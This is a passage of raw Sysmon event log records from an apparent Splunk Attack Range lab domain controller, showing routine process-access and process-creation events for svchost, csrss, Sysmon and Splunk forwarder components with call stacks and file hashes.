\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-445C-6000-1401-000000009A01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.414{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445C-6000-1401-000000009A01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:16.416{08A6967A-445C-6000-1401-000000009A01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.899{08A6967A-445D-6000-1501-000000009A01}46481464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445D-6000-1501-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-445D-6000-1501-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.758{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445D-6000-1501-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:17.759{08A6967A-445D-6000-1501-000000009A01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.571{08A6967A-445E-6000-1601-000000009A01}48804424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445E-6000-1601-000000009A01}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 